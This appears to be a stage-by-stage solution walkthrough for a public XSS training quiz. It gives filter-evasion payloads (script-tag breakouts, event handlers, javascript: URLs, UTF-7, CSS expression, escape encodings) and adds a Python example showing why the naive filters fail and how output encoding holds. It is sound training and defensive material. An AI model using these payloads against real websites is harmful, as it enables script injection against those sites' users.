http://xss-quiz.int21h.jp/
Notes (for all stages):
* NEVER DO ANY ATTACKS EXCEPT XSS.
* DO NOT USE ANY AUTOMATED SCANNER (AppScan, WebInspect, WVS, ...)
* Some stages may fit only IE.
Stage #1:
URL: http://xss-quiz.int21h.jp/?sid=7b2ec32a44f5676dbc2ad38d82708b4e48d596df
Hint: very simple...
Solution: Xssss"</b><script>alert(document.domain);</script><b>"Xssss
Stage #2:
URL: http://xss-quiz.int21h.jp/stage2.php?sid=4998593ac8245a1e877a2c16905603858fa94e8f
Hint: close the current tag and add SCRIPT tag...
Solution: Xssss"><script>alert(document.domain);</script><br id="x
Stage #3: other submittable parameters
URL: http://xss-quiz.int21h.jp/stage-3.php?sid=02f61eab83fab43d957ebf83139f53584a5f65b8
Hint: The input in text box is properly escaped.
Solution: p2=Japan<script>alert(document.domain);</script>
Stage #4: hidden form field
URL: http://xss-quiz.int21h.jp/stage_4.php?sid=e6cc736448dbe244a28fb221afde842150c404f4
Hint: invisible input field
Solution: p3=hackme"><script>alert(document.domain);</script><br id="x
Stage #5: input box length is limited
URL: http://xss-quiz.int21h.jp/stage--5.php?sid=25dff63827e73b082b8d196a13a0ed3a6d7fb7dc
Hint: length limited text box
Solution: p1=Xssss%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2fscript%3E%3Cb%20id%3D%22x
Stage #6: < and > are converted to &lt; and &gt;
URL: http://xss-quiz.int21h.jp/stage-no6.php?sid=d37bbdc69d77bd8b10ec200e24dd6f0450b4cc53
Hint: event handler attributes
Solution: Xssss" onfocus=javascript:alert(document.domain); id="x
Stage #7: adding an element attribute
URL: http://xss-quiz.int21h.jp/stage07.php?sid=7abf224a51a26fd9b765e5f5a4f625636f978ef1
Hint: nearly the same... but a bit more tricky.
Solution: Xssss onfocus=javascript:alert(document.domain)
Stage #8: using href
URL: http://xss-quiz.int21h.jp/stage008.php?sid=3d0bb2a2691110ff2fb7d43162d99e9d0e8b6c45
Hint: the 'javascript' scheme.
Solution: javascript:alert(document.domain);
Stage #9: UTF-7 -- tested successfully on IE7 (php -- mb_convert_encoding($string, 'UTF-7'))
URL: http://xss-quiz.int21h.jp/stage_09.php?sid=902024280ebc04bfbeca57f2e54e75a482c14e12
Hint:
Solution: p1=Xssss%2BACI++onmouseover%2BAD0AIg-javascript%3Aalert%28document.domain%29%2BACI++id%2BAD0AIg-x&charset=UTF-7
Stage #10: the string "domain" is filtered
URL: http://xss-quiz.int21h.jp/stage00010.php?sid=1d55eee5a44ab3d875549671b0d7fdd53d8c05e1
Hint: UTF-7 XSS
Solution: p1=Xssss%22%3E%3Cscript%3Ealert%28document.ddomainomain%29%3B%3C%2Fscript%3E%3Cbr+%2F
Stage #11: filtering - tags/methods
URL: http://xss-quiz.int21h.jp/stage11th.php?sid=af010211680adb334c35671f3d146723df66e8ec
Hint: "s/script/xscript/ig;" and "s/on[a-z]+=/onxxx=/ig;" and "s/style=/stxxx=/ig;"
Solution: p1=Xssss"><a href="javascript:alert(document.domain);">Xssss</a><br id="x
Stage #12: IE
URL: http://xss-quiz.int21h.jp/stage_no012.php?sid=5e25fb0f407625837c9810f58c66673c52df60e0
Hint: "s/[\x00-\x20\<\>\"\']//g;"
Solution: ``onfocus=alert(document.domain)
Stage #13: STYLE
URL: http://xss-quiz.int21h.jp/stage13_0.php?sid=9b00913b1a60ca6344c1f26a6d352af3d7ee4c72
Hint: style attribute
Solution: background-color:salmon;input:expression(javascript:alert(document.domain)) (in IE the alert box pops up in a loop)
Solution: background-color:salmon;input:expression((window.x==1)?'':(window.x=1,alert(document.domain)))
Stage #14: STYLE comment delimiter
URL: http://xss-quiz.int21h.jp/stage-_-14.php?sid=a629a8aaa2a217f28046edb7722a9083f4612419
Hint: s/(url|script|eval|expression)/xxx/ig;
Solution: background-color:salmon;input:e/**/xpression((window.x==1)?'':(window.x=1,alert(document.domain)))
Stage #15: filtering -- escape encoding
URL: http://xss-quiz.int21h.jp/stage__15.php?sid=0480521f1f39f182becacfbedf36210ca0140fe5
Hint: document.write();
Solution: hogehoge\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e
Stage #16: filtering -- escape encoding
URL: http://xss-quiz.int21h.jp/stage00000016.php?sid=9c7972a074c9caf57100746acaab2864cd2dff2e
Hint: "document.write();" and "s/\\x/\\\\x/ig;"
Solution: hogehoge\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e
Stage #17:
URL: http://xss-quiz.int21h.jp/stage-No17.php?sid=53f40e41f2c7a0eef557e1f469e312e02aa0ddba
Hint: multi-byte character
Solution: p1=1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7
Stage #18:
URL: http://xss-quiz.int21h.jp/stage__No18.php?sid=66431e719a0b192f11d5c86252382c114ad7dda3
Hint: us-ascii high bit issue
Stage #19:
URL: http://xss-quiz.int21h.jp/stage_--19.php?sid=e32c8f9cd60f79786b67defb896fad8a7c7f461a
Hint: Twitter DomXss at Sep 24, 2010
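Why the filters in Stages #6 and #10 fail while output encoding holds, as an added example that is not part of the original notes or the quiz's own code. The two filter functions, the input template and the href allow-list are assumptions reconstructed from the stage descriptions above.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Inputs taken from the Stage #2, #6 and #8 entries above.
STAGE2 = 'Xssss"><script>alert(document.domain);</script><br id="x'
STAGE6 = 'Xssss" onfocus=javascript:alert(document.domain); id="x'
STAGE8 = 'javascript:alert(document.domain);'

def stage6_filter(s):
    # Assumed filter: only < and > are entity-encoded, quotes pass through.
    return s.replace("<", "&lt;").replace(">", "&gt;")

def stage10_filter(s):
    # Assumed filter: one left-to-right removal of "domain", not repeated.
    return s.replace("domain", "")

def render_input(value, encode):
    # Hypothetical template: the value lands inside a double-quoted attribute.
    return '<input type="text" value="%s">' % encode(value)

class _Tags(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []
    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def parse_tags(markup):
    p = _Tags()
    p.feed(markup)
    p.close()
    return p.tags

def markup_injected(markup):
    # True when parsing yields anything other than the single
    # <input type=... value=...> element the template intended.
    tags = parse_tags(markup)
    return not (len(tags) == 1 and tags[0][0] == "input"
                and set(tags[0][1]) == {"type", "value"})

def encode_attr(value):
    # Output encoding for HTML text and quoted attributes: & < > " ' become entities.
    return html.escape(value, quote=True)

def safe_href(url):
    # Entity encoding does not help inside href; allow-list the scheme instead.
    # Relative URLs are rejected as well in this sketch.
    return url if urlsplit(url.strip()).scheme.lower() in ("http", "https") else "#"
```

With `encode_attr` the parsed `value` attribute round-trips to the exact submitted string, so nothing is lost by encoding instead of filtering.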
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
Other walkthroughs:
http://blogs.tunelko.com/2013/12/02/xss-challenges/
http://blog.knownsec.com/Knownsec_RD_Checklist/xss/xss_quiz.txt
Recommended:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet